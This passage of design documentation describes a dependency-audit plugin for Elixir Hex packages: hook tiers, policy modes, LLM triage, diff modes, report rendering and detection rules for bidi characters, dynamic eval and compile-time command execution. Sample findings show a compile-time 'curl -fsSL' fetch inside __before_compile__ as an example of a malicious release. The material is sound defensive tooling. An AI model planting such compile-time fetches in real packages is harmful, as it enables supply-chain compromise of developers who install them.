      - **Rule 5 — new `:git` or `:path` deps in `mix.exs`.** Git-diffs
        against `${PHX_DEPS_AUDIT_BASE:-origin/main}` to isolate ADDED
        non-Hex deps. Re-locks of existing `:git` deps are ignored.
      
      Both rules are **zero false positive** by design and produce stable
      NDJSON findings compatible with the Phase 2 differ output. If both
      rules return clean, the gate prints a one-line stderr hint
      ("`Run /phx:deps-audit for full pipeline`") and exits 0.
      
      Rules 2, 3, 4, 7, 8 are intentionally deferred to Tier 2 — they
      require unpacking tarballs and lose the <2s budget on the very first
      new package.
      
      ## Tier 2: full pipeline (opt-in only)
      
      Tier 2 invocation is NOT chained from the hook. When `block_on_unvetted`
      is `:full`, the hook still only runs Tiers 0+1, blocks on Tier 1
      findings, and points the user at `/phx:deps-audit` for the full Tier 2
      pipeline. Reason: hook-budget exhaustion via the Bash 600s timeout is
      worse UX than an explicit "run the audit" message.
      
      The `/phx:deps-audit` skill body owns Tier 2 — when invoked manually,
      it can take 30-90s, run subagents, and update `last-run.json` so the
      next hook invocation gets a Tier 0 hit.
      
      ## Policy enforcement
      
      The hook reads `policy.block_on_unvetted` from `hex_vet.exs` (see
      `deps-vet/references/hex-vet.md` for the tri-mode schema) and gates
      findings accordingly:
      
      | Mode | On Tier 1 findings |
      |------|--------------------|
      | `false` | Print summary, exit 0 (warn-only) |
      | `:new_only` (default) | Block ONLY on rule 1 (bidi) and rule 5 (new dep). Both ARE "new" signals by definition. |
      | `:strict` | Block on any Tier 1 finding |
      | `:full` | Same as `:strict` for hook scope; full pipeline runs via skill body |
      
      Override: `PHX_SKIP_DEPS_AUDIT=1 mix deps.get` bypasses the gate
      entirely. The escape hatch is critical for emergency unblocks and CI
      environments where the audit runs separately.
      
      ## Latency budget rationale
      
      - **Tier 0 cache hit**: dominant case during feature work where
        `mix.lock` doesn't change between calls. Target: <200ms p95 so the
        hook is invisible to the developer.
      - **Tier 1**: target <2s p95. Bidi grep on `mix.lock` is ~50ms.
        Rule 5's `git show` + `comm` against a 100-line `mix.exs` is ~200ms.
        Slowest path is git-fetch when `PHX_DEPS_AUDIT_BASE` is stale; users
        should pre-fetch in pre-commit or CI.
      - **Tier 2**: explicitly unbounded; only reached on user opt-in via
        `/phx:deps-audit`.
      
      ## Failure modes
      
      - **No `mix.lock`** → exit 0 (no deps to audit yet; first `deps.get`).
      - **No `hex_vet.exs`** → mode defaults to `false` (warn-only). Hook
        still runs Tiers 0+1, prints findings as warnings, never blocks. The
        user gets visibility without the friction.
      - **Corrupt `last-run.json`** → Tier 0 returns false, Tier 1 runs.
        Worst case: 2s of work, then a fresh `last-run.json` overwrites.
      - **`PHX_DEPS_AUDIT_BASE` unreachable** → Rule 5 treats whole `mix.exs`
        as new (false-positive favored over silent-pass). Set the env to a
        local ref (`HEAD~1`) for offline work.
      
      ## Hook registration
      
      In `hooks/hooks.json`, the gate runs under `PreToolUse → Bash`
      alongside `block-dangerous-ops.sh`. The `if: "Bash(*mix deps.*)"`
      condition keeps the script silent on non-deps commands — the script
      itself also re-checks the command, defense-in-depth.
      
      ```json
      {
        "type": "command",
        "if": "Bash(*mix deps.*)",
        "command": "${CLAUDE_PLUGIN_ROOT}/hooks/scripts/deps-audit-gate.sh",
        "timeout": 5,
        "statusMessage": "Tiered deps audit..."
      }
      ```
      
      The 5-second timeout caps Tier 1 hard. If the hook itself runs over,
      the exit code propagates as "hook failed" — the user sees the timeout,
      not a stuck `mix` invocation.
      
      ## CI usage
      
      In CI, set `PHX_SKIP_DEPS_AUDIT=1` for `mix deps.get` steps and run
      `mix phx.deps_audit --ci` as a separate job — CI wants determinism
      and full Tier 2 output, not the fast-path hook.
      
      See `ci-integration.md` for sample workflows.
      
    • llm-triage.md 5.8 KB
      # LLM triage — two-tier with context-supervisor
      
      Phase 2 adds optional LLM-assisted triage on top of the deterministic
      rule layer. The deterministic rules carry the security load; the LLM
      compresses evidence and surfaces likely-FPs vs likely-TPs to the
      human reviewer. **No finding is auto-suppressed without human review.**
      
      ## Iron Laws
      
      1. **TRIAGE IS ADVISORY.** LLM verdicts adjust the *renderer's
         ordering and visual emphasis*, never the underlying severity in
         the NDJSON stream. Audit findings remain the source of truth.
      2. **THRESHOLD-GATED.** Triage runs only when a package's weighted
         score exceeds 10 (BLOCK=10, WARN=3, INFO=1). Below threshold,
         the deterministic output is the final word.
      3. **TWO-TIER MANDATORY.** Per-package triagers write JSON files;
         a `context-supervisor` consolidates. Main skill reads
         ONLY the consolidated file. Reading per-package outputs directly
         in the main context blows the budget on 5+ packages.
      4. **NO INVENTED FINDINGS.** Each verdict maps 1:1 to an input
         finding. Post-call validator drops verdicts whose `rule_id +
         file + line` triple isn't in the input set.
      
      ## Architecture
      
      ```
      deps-audit body
          │
          ▼ score > 10 for package P?
          │
          ├─► YES → spawn hex-deps-triager (sonnet) for P
          │            ↓ writes triage/<pkg>-<ts>.json
          │
          ▼   (wait for all triagers)
      context-supervisor
          │
          ▼ reads triage/<pkg>-*.json files
          │
          ▼ writes triage/consolidated.md
          │
      deps-audit body reads consolidated.md
      ```
      
      ## Two-tier rationale
      
      A 20-package audit run produces ~3-5KB of findings.jsonl. Each
      triager fetches 3-line diff windows × N findings — easily 50KB
      context per package. Running 10 triagers in parallel and then
      synthesizing in the main context exhausts the budget on
      synthesize.
      
      Splitting the work: per-package triager has its own context, writes
      a small structured verdict (1-3KB). The supervisor's input is
      N × 3KB ≈ 30KB even at 10 packages — well within the supervisor's window.
      Main skill reads a single consolidated.md (<5KB).
      
      ## Triager spawn pattern
      
      The skill body builds one input JSON per package, then spawns
      triagers in parallel via the Agent tool:
      
      ```bash
      # Pseudocode — the skill's actual body uses Task() blocks
      for pkg in $(jq -r 'keys[]' high_score.json); do
        build_triager_input "${pkg}" > "/tmp/triage-in-${pkg}.json"
        spawn_task --subagent_type hex-deps-triager \
                   --prompt "Triage findings for ${pkg}.
                             Input: /tmp/triage-in-${pkg}.json
                             Output: .claude/deps-audit/triage/${pkg}-$(date +%s).json"
      done
      wait
      ```
      
      After all triagers complete, the skill spawns `context-supervisor`:
      
      ```bash
      spawn_task --subagent_type context-supervisor \
                 --prompt "Consolidate triage verdicts.
                           Inputs: .claude/deps-audit/triage/*.json
                           Output: .claude/deps-audit/triage/consolidated.md
                           Group by verdict (likely_malicious, needs_human,
                           likely_benign). Surface model+confidence per
                           verdict. Sum across packages."
      ```
      
      ## Input JSON contract
      
      See `hex-deps-triager.md` agent. Each input contains:
      
      - `package`, `version`, `previous_version`
      - `tarball_dir`, `previous_tarball_dir` (absolute paths)
      - `findings[]` — list with `rule_id`, `file`, `line`, `snippet`,
        `message`, `diff_window` (3 lines context)
      - `hex_metadata` — downloads, owners, release_publisher, inserted_at
      
      Build via `mix run --no-mix-exs -e` over the existing findings.jsonl
      plus the hex-api cache. Keep diff_window ≤200 chars per finding to
      control input size.
      
      ## Output JSON contract
      
      ```json
      {
        "package": "<pkg>",
        "version": "<version>",
        "model": "sonnet",
        "summary": "<one-line per-package summary>",
        "verdicts": [
          {
            "rule_id": <int>,
            "file": "<file>",
            "line": <int>,
            "confidence": <0.0..1.0>,
            "verdict": "likely_benign | needs_human | likely_malicious",
            "rationale": "<one paragraph>",
            "fp_reasons": ["<reason1>", "<reason2>"]
          }
        ]
      }
      ```
      
      Validation pass after each triager:
      
      1. Verify the file parses as JSON.
      2. Verify every `verdicts[].{rule_id, file, line}` triple appears
         in the input `findings[]`. Mismatches are dropped with a warning.
      3. Verify `verdict` and `confidence` ranges. Out-of-range
         verdicts → `needs_human` with `confidence: 0.0`.
      
      ## Consolidated output
      
      The `context-supervisor` produces a markdown file shaped like:
      
      ```markdown
      # Triage Consolidated — N packages, M findings
      
      ## Summary
      - Likely malicious: 1 (1 finding)
      - Needs human review: 3 (5 findings)
      - Likely benign: 7 (12 findings)
      
      ## Likely malicious (BLOCK by default)
      ### phoenix_extras 0.2.0 → 0.3.0 (score 22, sonnet conf 0.92)
      - rule 3 (compile-time exec) at lib/init.ex:14 — System.cmd to
        unknown URL inside __before_compile__. New maintainer + 1mo old.
      
      ## Needs human review
      ...
      
      ## Likely benign (consider INFO downgrade)
      ...
      ```
      
      The deps-audit renderer reads this and slots the sections above
      the per-package findings tables.
      
      ## Token budget
      
      | Component | Budget | Actual (10 pkg audit) |
      |-----------|--------|----------------------|
      | Per-triager input | ≤15KB | ~5-10KB |
      | Per-triager output | ≤3KB | ~1-2KB |
      | Consolidator input | 10 × 3KB | ~25KB |
      | Consolidator output | ≤5KB | ~3KB |
      | Main skill triage read | ≤5KB | ~3KB |
      
      Compared to the naive approach (main reads 10 × 10KB = 100KB), the
      two-tier flow saves ~95% of the post-triage context burn.
      
      ## When NOT to invoke LLM triage
      
      - Package score ≤ 10 → deterministic output suffices.
      - Mode A (`--preview`) on a single package not yet locked → user is
        exploring; the audit table is enough.
      - `--no-llm` flag passed by the user.
      - No `ANTHROPIC_API_KEY` available in the environment — fall back
        cleanly to deterministic output with a warning.
      
    • operating-modes.md 5.1 KB
      # Operating Modes — A / B / C
      
      The audit engine is **mode-agnostic**:
      
      ```
      audit(pkg, old_version, new_version) → findings[]
      ```
      
      Modes only change how `(old, new)` pairs get resolved. The engine never
      inspects how the diff came to be.
      
      ## Mode B — Default (working vs HEAD)
      
      ```
      /phx:deps-audit
      ```
      
      Compares the working-tree `mix.lock` against `git show HEAD:mix.lock`.
      
      | | |
      |---|---|
      | **Old source** | `git show HEAD:mix.lock` |
      | **New source** | working `mix.lock` |
      | **Use case** | Post-`mix deps.update` safety net. Pre-commit gate. |
      | **Cost** | Cheapest mode — no remote calls for diff resolution |
      | **Why default** | Catches Igniter / auto-update footguns retroactively, before commit |
      
      If HEAD has no `mix.lock` (initial commit, brand new dep), every locked
      package is treated as a NEW package (`old_version = nil`). Diff-only rules
      (Rule 5, Rule 6) are skipped for new packages; static rules (1, 2, 3, 4, 7)
      still run.
      
      ## Mode C — PR / branch comparison
      
      ```
      /phx:deps-audit --base main
      /phx:deps-audit --base origin/main
      /phx:deps-audit --base abc1234
      ```
      
      Compares the working-tree `mix.lock` against `git show <ref>:mix.lock`.
      
      | | |
      |---|---|
      | **Old source** | `git show <ref>:mix.lock` |
      | **New source** | working `mix.lock` |
      | **Use case** | CI on PRs that touch `mix.lock`. Pre-PR self-review. |
      | **Cost** | Same as Mode B |
      | **CI hint** | `/phx:deps-audit --base origin/main --json` for machine-readable output |
      
      `<ref>` is any valid Git revision: branch name, tag, commit SHA, `HEAD~N`.
      
      ## Mode A — Preview (locked vs Hex latest)
      
      ```
      /phx:deps-audit --preview                 # all locked deps vs latest
      /phx:deps-audit --preview httpoison       # one package
      /phx:deps-audit --preview httpoison req   # multiple
      ```
      
      Compares the locked version against the latest version on Hex.pm.
      
      | | |
      |---|---|
      | **Old source** | Version in working `mix.lock` |
      | **New source** | Latest version from Hex API (`GET /api/packages/:name`) |
      | **Use case** | "If I run `mix deps.update X`, what lands?" Pre-update analysis. |
      | **Cost** | Adds 1 Hex API call per package (cached 1h) |
      | **Limitation** | Does not resolve transitive deps. Only the named packages. |
      
      If no packages are specified, all packages from `mix.lock` are previewed.
      Cap at 50 packages to avoid Hex API spam — show a warning and stop if
      exceeded.
      
      ## Resolver pseudocode
      
      ```elixir
      def resolve_pairs(mode) do
        case mode do
          :working_vs_head ->
            old = parse_lock(git_show("HEAD:mix.lock"))
            new = parse_lock(File.read!("mix.lock"))
            diff_pairs(old, new)
      
          {:base, ref} ->
            old = parse_lock(git_show("#{ref}:mix.lock"))
            new = parse_lock(File.read!("mix.lock"))
            diff_pairs(old, new)
      
          {:preview, packages} ->
            locked = parse_lock(File.read!("mix.lock"))
            pkgs = if packages == [], do: Map.keys(locked), else: packages
            Enum.map(pkgs, fn pkg ->
              latest = hex_api_latest(pkg)
              {pkg, locked[pkg], latest}
            end)
        end
      end
      
      defp diff_pairs(old_map, new_map) do
        changed =
          for {pkg, new_v} <- new_map, old_v = old_map[pkg], new_v != old_v do
            {pkg, old_v, new_v}
          end
      
        added =
          for {pkg, new_v} <- new_map, !Map.has_key?(old_map, pkg) do
            {pkg, nil, new_v}
          end
      
        removed =
          for {pkg, old_v} <- old_map, !Map.has_key?(new_map, pkg) do
            {pkg, old_v, nil}
          end
      
        %{changed: changed, added: added, removed: removed}
      end
      ```
      
      (Pseudocode — actual implementation lives inline in the skill body as shell
      or `mix run -e` snippets. Plugin has no `lib/` directory.)
      
      ## `mix.lock` format
      
      Erlang term format:
      
      ```elixir
      %{
        "phoenix" => {:hex, :phoenix, "1.7.14", "checksum", :mix, [...], "hexpm", "hash"},
        ...
      }
      ```
      
      Position 3 is the version string. Use `Code.eval_file("mix.lock")` or a
      simple regex to extract; the format has been stable for years.
      
      ## Why Mode B is the default
      
      1. **Zero new infra** — `git show` is one shell call
      2. **Retroactive Igniter check** — catches auto-update footguns before commit
      3. **Natural pre-commit hook integration** — Phase 3 PreToolUse hook just
         invokes Mode B on the working-tree diff
      4. **Mode A needs more work** — Hex API resolver for latest versions plus
         transitive resolution. Strictly more code paths than Mode B.
      
      ## What modes deliberately do NOT do
      
      - **No transitive resolution in Mode A** — we audit only the packages
        named or already in `mix.lock`. Use `mix deps.tree` for full transitive.
      - **No fetch of removed packages** — a `removed: [...]` package is reported
        in the table as "removed", but no rule runs on it. There's no NEW to audit.
      - **No automatic mode promotion** — the user picks. Default = B.
      
      ## Mode selection examples
      
      | Situation | Command |
      |-----------|---------|
      | Just ran `mix deps.update`, want pre-commit check | `/phx:deps-audit` |
      | Reviewing a PR that bumped `mix.lock` | `/phx:deps-audit --base origin/main` |
      | Considering whether to update `httpoison` | `/phx:deps-audit --preview httpoison` |
      | Curious which deps could update | `/phx:deps-audit --preview` (capped at 50) |
      | Just merged main, want fresh audit on whole tree | `git fetch && /phx:deps-audit --base origin/main~1` |
      
    • output-renderer.md 9.8 KB
      # Output Renderer
      
      Two outputs from every audit:
      
      1. **Stdout** — markdown table + per-package detail (terminal-first)
      2. **Sidecar** — `.claude/deps-audit/last-run.json` (machine-readable)
      
      ## Scoring weights & risk bands
      
      ```
      BLOCK = 10 points
      WARN  =  3 points
      INFO  =  1 point
      
      Per-package risk = sum of findings' points
      
      Risk band:
         0          → clean
         1–5        → low
         6–15       → medium
         16+        → high
      ```
      
      Risk emoji used in markdown for skim-readability:
      
      | Band | Emoji | Meaning |
      |------|-------|---------|
      | clean | ✅ | No findings |
      | low | 🟢 | INFO / minor WARN |
      | medium | 🟡 | Multiple WARNs or 1 BLOCK |
      | high | 🔴 | Multiple BLOCKs |
      
      (Emoji is the *only* place this skill uses Unicode glyphs in output; the
      rest of the renderer is ASCII to keep diff/grep-friendly.)
      
      ## Security-changelog headline (Phase 5)
      
      When `diff_cves.py` emits any `patched`, `introduced`, or `still_exposed`
      findings, the renderer **prepends a headline section** before the
      package table — the actionable summary of what the update changed.
      
      ### Render order
      
      ```
      1. (BLOCK headline)    introduced + still_exposed CVEs    ← if any
      2. (INFO  headline)    patched CVEs (the security changelog)
      3.                     existing markdown table
      4.                     per-package detail sections
      5.                     editorial framing (major bumps, etc.)
      ```
      
      `patched` is `info` severity but lifts to the headline regardless —
      it's the user-facing security story for the update.
      
      ### Patched (informational, lifted to top)
      
      ```markdown
      # Hex Dependency Audit — Mode B (working vs HEAD)
      
      🚨 4 of 25 updates patched real CVEs. You were exposed:
      
      - decimal 2.3.0 → 3.1.0: CVE-2026-32686 (high) — DoS via unbounded exponent
        Disclosed 2026-05-07. 6 days exposed.
      - bandit 1.10.3 → 1.11.0: CVE-2026-39805 (high) — HTTP/1.1 request smuggling
        Disclosed 2026-05-01. 12 days exposed. (+1 more CVE in this bump)
      - phoenix 1.8.5 → 1.8.7: CVE-2026-32689 (high) — long-poll NDJSON DoS
        Disclosed 2026-05-05. 8 days exposed.
      - postgrex 0.22.0 → 0.22.1: CVE-2026-32687 (critical) — SQL injection in Notifications.listen/3
        Disclosed 2026-05-12. 1 day exposed.
      
      **Recommendation:** ship these updates ASAP.
      ```
      
      Format spec:
      
      - Leading `🚨 N of M` line ONLY when patched findings exist — single
        emoji per report, never per-finding.
      - One bullet per (package, GHSA) pair. Bundle multi-CVE bumps with
        `(+N more CVE in this bump)` to keep the list scannable.
      - `Disclosed YYYY-MM-DD. N days exposed.` from `exposure_days` field.
      - Final line: "**Recommendation: ship these updates ASAP.**"
      
      ### Introduced (regression — BLOCK at top)
      
      ```markdown
      🛑 BLOCKED — 1 update INTRODUCED a CVE (regression):
      
      - examplepkg 1.0.0 → 1.0.1: CVE-2026-99999 (critical) — Compromised release introduces RCE
        Disclosed 2026-05-10. This update should NOT be merged.
      
      This is a regression: the OLD version did not have this CVE; the NEW
      version does. Investigate the release (`mix hex.package diff <pkg> <old> <new>`)
      before proceeding.
      ```
      
      Format spec:
      
      - `🛑 BLOCKED — N update(s) INTRODUCED a CVE`
      - Bullet per finding, ending "This update should NOT be merged."
      - Followup line with the `mix hex.package diff` command stub.
      
      ### Still exposed (didn't fix it — BLOCK at top)
      
      ```markdown
      🛑 BLOCKED — 1 CVE STILL EXPOSED after this update:
      
      - decimal 2.3.0 → 2.3.1: CVE-2026-32686 (high) — DoS via unbounded exponent
        The fix is in decimal >= 3.0.0; this bump did not address the CVE.
        Disclosed 2026-05-07.
      
      **Recommendation:** bump further (mix deps.update decimal to >= 3.0.0).
      ```
      
      Format spec:
      
      - `🛑 BLOCKED — N CVE(s) STILL EXPOSED after this update`
      - Include `patched_versions` constraint from advisory ("fix is in X >= Y").
      - Recommend a more-aggressive bump.
      
      ### Combining
      
      If both `introduced` and `still_exposed` exist, render both headlines
      (introduced first — it's the more urgent failure mode). `patched` only
      renders if NO blockers exist for the same packages — the user has
      bigger problems than the security changelog when something is blocked.
      
      ## Markdown table — top section
      
      ```markdown
      # Hex Dependency Audit — Mode B (working vs HEAD)
      
      Audited 4 changed · 1 added · 0 removed packages.
      Tools run: mix hex.audit ✓ · mix_audit ✓ · osv-scanner ✗ (not installed)
      
      | Package | Change | Risk | Findings | diff.hex.pm |
      |---------|--------|------|----------|-------------|
      | phoenix | 1.7.14 → 1.7.20 | ✅ clean | — | [view](https://diff.hex.pm/diff/phoenix/1.7.14..1.7.20) |
      | ecto    | 3.13.2 → 3.13.4 | 🟢 low (3) | 1× WARN: base64 in priv/img | [view](https://diff.hex.pm/diff/ecto/3.13.2..3.13.4) |
      | req     | 0.5.0 → 0.5.1 | 🔴 high (23) | 2× BLOCK · 1× WARN — maintainer changed | [view](https://diff.hex.pm/diff/req/0.5.0..0.5.1) |
      | **new_logger** (added) | — → 0.1.0 | 🔴 high (10) | 1× BLOCK: typosquat of `logger` (50× DLs) | [view](https://hex.pm/packages/new_logger) |
      ```
      
      When the security-changelog headline above already covered a package,
      the table still includes it (consistent grain) — but the per-package
      detail section refers back to the headline rather than repeating CVE
      text.
      
      ## Markdown — per-package detail (only for non-clean)
      
      For every row with score > 0, emit a detail section in order:
      
      ```markdown
      ## req — 🔴 high (score 23)
      
      Maintainer changed: alice_dev → bob_unknown (between 0.5.0 and 0.5.1)
      
      ### Findings
      
      - **BLOCK · rule 6 · maintainer change**
        `release publisher`: bob_unknown (was alice_dev)
        GHSA: n/a · CVE: n/a
      
      - **BLOCK · rule 3 · System.cmd at compile time**
        `lib/req/setup.ex:14`
            System.cmd("curl", ["-fsSL", url])
        Triggered inside `__before_compile__/1`.
      
      - **WARN · rule 7 · base64 blob >256 chars**
        `lib/req/templates.ex:42`
            "TG9yZW0gaXBzdW0gZG9sb3Igc2l0IGFtZXQs..." (412 chars)
      ```
      
      Layout rules:
      
      - Header includes risk emoji, band name, and score in parens
      - One blank line between findings
      - Code blocks for snippets are indented 4 spaces, never fenced
        (so they render cleanly even when output is piped through grep)
      - File:line shown as plain `path:line` for terminal hyperlinking
      - diff.hex.pm link **only** appears in the top table, not per-finding
      
      ## Markdown footer
      
      ```markdown
      ---
      
      **Aggregate risk:** 🔴 high (1 package over threshold)
      
      Re-run after fix: `/phx:deps-audit`
      Inspect one package: `/phx:deps-audit --preview req`
      Compare against main: `/phx:deps-audit --base origin/main`
      
      Detailed findings: `.claude/deps-audit/last-run.json`
      ```
      
      ## `--json` flag
      
      Replaces the markdown stdout with the same data the sidecar would receive.
      Useful for CI consumers. Schema:
      
      ```json
      {
        "version": 1,
        "generated_at": "2026-05-12T10:32:18Z",
        "mode": "B",
        "base": "HEAD",
        "tools": {
          "hex_audit": {"available": true, "ran": true},
          "mix_audit": {"available": true, "ran": true},
          "osv_scanner": {"available": false, "ran": false}
        },
        "summary": {
          "changed": 4, "added": 1, "removed": 0,
          "packages_with_findings": 2,
          "highest_risk_band": "high",
          "blocks_total": 3, "warns_total": 2, "infos_total": 0
        },
        "packages": [
          {
            "pkg": "req",
            "old_version": "0.5.0",
            "new_version": "0.5.1",
            "diff_url": "https://diff.hex.pm/diff/req/0.5.0..0.5.1",
            "risk_score": 23,
            "risk_band": "high",
            "maintainer_change": {"from": "alice_dev", "to": "bob_unknown"},
            "findings": [
              {
                "rule_id": 6,
                "severity": "block",
                "file": null, "line": null,
                "snippet": "alice_dev → bob_unknown",
                "message": "Maintainer changed between 0.5.0 and 0.5.1"
              },
              {
                "rule_id": 3,
                "severity": "block",
                "file": "lib/req/setup.ex", "line": 14,
                "snippet": "System.cmd(\"curl\", [\"-fsSL\", url])",
                "message": "System.cmd at compile time (inside __before_compile__/1)"
              }
            ],
            "external_findings": []
          }
        ]
      }
      ```
      
      Schema versioned with `"version": 1` so Phase 3 hook can detect
      incompatible upgrades without parsing.
      
      ## Sidecar file
      
      Always written to `.claude/deps-audit/last-run.json` regardless of `--json`
      flag. Phase 3 PreToolUse hook reads this file to detect "recently audited"
      state — if `generated_at` is within the last 10 minutes AND the working
      `mix.lock` has the same SHA-256, allow `mix deps.get`/`update` without
      re-audit prompt.
      
      ## Quiet mode
      
      `--quiet` suppresses clean rows from the markdown table. Useful for
      CI/pre-commit hooks that should only chime on findings.
      
      ## Exit code rubric
      
      | Outcome | Exit code |
      |---------|-----------|
      | All packages clean | 0 |
      | Some WARNs, no BLOCKs | 0 |
      | Any BLOCK finding | 2 |
      | Audit infrastructure failed (missing tools, bad network) | 3 |
      
      Exit `2` is the conventional CC plugin convention for "findings present,
      human review needed." Exit `3` separates "you can't trust this audit" from
      "this audit caught something."
      
      ## Implementation entry point
      
      The renderer reads `${AUDIT_TMPDIR}/findings.json` (a flat array
      written by each rule + tool wrapper) and the original `diff.json` from the
      resolver, then emits both outputs.
      
      ```bash
      render() {
        local fmt="${1:-markdown}"
        local findings="${AUDIT_TMPDIR}/findings.json"
        local diff="${AUDIT_TMPDIR}/diff.json"
      
        case "${fmt}" in
          markdown) render_markdown "${diff}" "${findings}" ;;
          json)     render_json     "${diff}" "${findings}" ;;
        esac
      
        write_sidecar "${diff}" "${findings}" > .claude/deps-audit/last-run.json
      }
      ```
      
      `render_markdown` and `render_json` are jq programs (kept inline in
      the skill body — see [implementation skeleton in heuristics.md](heuristics.md)
      for the per-rule shape contract findings must obey).
      
      ## Anti-pattern: emoji-only signals
      
      Some renderers use emoji as the *only* severity marker. Don't. Always
      include the band name in text (`high`, `medium`, etc.) so the output is
      greppable and accessible to terminals without emoji rendering.
      
    • rules-impl.md 18 KB
      # MVP Rule Implementations
      
      Eight detection routines. Each emits zero or more findings as
      NDJSON lines (one JSON object per line) to the file named by
      `${FINDINGS_FILE}` (defaults to
      `${AUDIT_TMPDIR}/findings.jsonl`). The renderer aggregates by
      package.
      
      ## Portability floor
      
      Every new native regex rule MUST use **perl**, not `grep -P` or
      `grep -E '{n,}'` for n > 255. macOS ships BSD grep, which:
      
      - Lacks `-P` (no PCRE — Unicode character classes don't work).
      - Caps interval quantifier `{n,}` at 255.
      
      Perl is preinstalled on every supported platform (macOS, Linux, WSL,
      Alpine via `apk add perl`). Treat perl as the cross-platform floor —
      even Linux GNU-grep environments work without change.
      
      Same applies to `comm` and `diff` for differential mode: BSD `comm`
      requires pre-sorted inputs and BSD `diff` lacks `--no-dereference`.
      Prefer Python (`scripts/diff_findings.py`) or jq for diffs.
      
      ## Common finding shape
      
      ```json
      {"pkg": "phoenix", "version": "1.7.20", "rule_id": 3, "severity": "block",
       "file": "lib/foo.ex", "line": 14, "snippet": "System.cmd(\"curl\", url)",
       "message": "System.cmd called at module top level"}
      ```
      
      `file` and `line` are nullable (for package-level findings like Rule 6).
      `snippet` is truncated to 200 chars.
      
      ## Helper: emit a finding
      
      ```bash
      emit() {
        jq -n -c \
          --arg pkg "$1" --arg version "$2" --argjson rule_id "$3" \
          --arg severity "$4" --arg file "$5" --arg line "$6" \
          --arg snippet "$7" --arg message "$8" \
          '{pkg:$pkg, version:$version, rule_id:$rule_id, severity:$severity,
            file:($file|select(.!="")), line:(if $line=="" then null else ($line|tonumber) end),
            snippet:$snippet, message:$message}' \
          >> "${FINDINGS_FILE:-${AUDIT_TMPDIR}/findings.jsonl}"
      }
      ```
      
      All rules below assume `$pkg` and `$ver` are set and `$tarball_dir` points
      to the unpacked NEW version (e.g.,
      `${AUDIT_TMPDIR}/tarballs/phoenix/1.7.20/`).
      
      ---
      
      ## Rule 1 — Bidi Unicode control chars (BLOCK)
      
      CVE-2021-42574 Trojan Source. Grep for the 9 directional-override control
      chars across all source files in the unpacked tarball.
      
      ```bash
      rule_1_bidi() {
        local pkg="$1" ver="$2" dir="$3"
        # PUA + bidi overrides: U+202A..U+202E, U+2066..U+2069, U+200E, U+200F, U+061C.
        # macOS BSD grep lacks -P (PCRE), so use perl for Unicode classes.
        find "${dir}" \( -name '*.ex' -o -name '*.exs' -o -name '*.erl' \) -print0 \
        | xargs -0 perl -CSD -ne '
            if (/[\x{202A}-\x{202E}\x{2066}-\x{2069}\x{200E}\x{200F}\x{061C}]/) {
              chomp; printf("%s\x1f%s\x1f%s\n", $ARGV, $., $_);
            }
          ' 2>/dev/null \
        | while IFS=$'\x1f' read -r file line snippet; do
            emit "${pkg}" "${ver}" 1 "block" \
              "${file#${dir}/}" "${line}" "${snippet:0:200}" \
              "Bidi/directional Unicode control char in source (Trojan Source CVE-2021-42574)"
          done
      }
      ```
      
      **FP rate:** ~0%. Legit uses of bidi chars in code source are exceedingly
      rare; localization strings live in `.po` files (not scanned).
      
      ---
      
      ## Rule 2 — `Code.eval_*` / `:erlang.apply` non-literal at module scope (BLOCK)
      
      Detects dynamic code evaluation called outside a function body. Uses
      `Code.string_to_quoted/2` to get an AST and walks it.
      
      ```bash
      rule_2_eval() {
        local pkg="$1" ver="$2" dir="$3"
      
        find "${dir}" -name '*.ex' -o -name '*.exs' | while read -r file; do
          mix run --no-deps-check --no-compile -e "
            path = System.argv() |> List.first()
            {:ok, ast} = path |> File.read!() |> Code.string_to_quoted(file: path, columns: true)
      
            scan = fn ast, scan ->
              case ast do
                # def/defp/defmacro body — skip subtree (function-scope eval is fine)
                {form, _, _} when form in [:def, :defp, :defmacro, :defmacrop] -> :ok
      
                # Top-level eval — flag
                {{:., _, [{:__aliases__, _, [:Code]}, op]}, meta, [arg | _]}
                    when op in [:eval_string, :eval_quoted] ->
                  unless is_binary(arg) and op == :eval_string and String.length(arg) < 5 do
                    IO.puts(\"#{meta[:line]}|Code.#{op}|non-literal eval at module scope\")
                  end
      
                # :erlang.apply with non-literal MFA
                {{:., _, [:erlang, :apply]}, meta, [m, _f, _a]} when not is_atom(m) ->
                  IO.puts(\"#{meta[:line]}|:erlang.apply|dynamic MFA at module scope\")
      
                {_, _, children} when is_list(children) -> Enum.each(children, &scan.(&1, scan))
                list when is_list(list) -> Enum.each(list, &scan.(&1, scan))
                _ -> :ok
              end
            end
            scan.(ast, scan)
          " -- "${file}" 2>/dev/null \
          | while IFS='|' read -r line snippet message; do
              emit "${pkg}" "${ver}" 2 "block" \
                "${file#${dir}/}" "${line}" "${snippet}" "${message}"
            done
        done
      }
      ```
      
      **FP rate:** ~1%. Legit eval at module scope is almost never seen; macros
      that build code use `quote do ... end`, not `Code.eval_string`.
      
      ---
      
      ## Rule 3 — `System.cmd` / `:os.cmd` / `Port.open` at compile time (BLOCK)
      
      Compile-time means: inside `defmacro`, `__before_compile__`,
      `__after_compile__`, or at the module top level. Same AST walk as Rule 2,
      different match patterns.
      
      ```bash
      rule_3_compile_exec() {
        local pkg="$1" ver="$2" dir="$3"
      
        find "${dir}" -name '*.ex' -o -name '*.exs' | while read -r file; do
          mix run --no-deps-check --no-compile -e "
            path = System.argv() |> List.first()
            {:ok, ast} = path |> File.read!() |> Code.string_to_quoted(file: path, columns: true)
      
            scan = fn ast, in_compile, scan ->
              case ast do
                # entering a function body — out of compile scope
                {form, _, _} = node when form in [:def, :defp] -> :ok
      
                # entering a compile-time callback
                {form, _, children} when form in [:defmacro, :defmacrop] and is_list(children) ->
                  Enum.each(children, &scan.(&1, true, scan))
      
                {:__before_compile__, _, _} -> Enum.each(elem(ast, 2) || [], &scan.(&1, true, scan))
                {:__after_compile__, _, _}  -> Enum.each(elem(ast, 2) || [], &scan.(&1, true, scan))
      
                # System.cmd / :os.cmd / Port.open at compile scope
                {{:., _, [{:__aliases__, _, [:System]}, :cmd]}, m, _} when in_compile ->
                  IO.puts(\"#{m[:line]}|System.cmd|System.cmd at compile time\")
                {{:., _, [:os, :cmd]}, m, _} when in_compile ->
                  IO.puts(\"#{m[:line]}|:os.cmd|:os.cmd at compile time\")
                {{:., _, [{:__aliases__, _, [:Port]}, :open]}, m, _} when in_compile ->
                  IO.puts(\"#{m[:line]}|Port.open|Port.open at compile time\")
      
                {_, _, children} when is_list(children) ->
                  Enum.each(children, &scan.(&1, in_compile, scan))
                list when is_list(list) -> Enum.each(list, &scan.(&1, in_compile, scan))
                _ -> :ok
              end
            end
      
            # Top-level expressions in a module body run at compile time
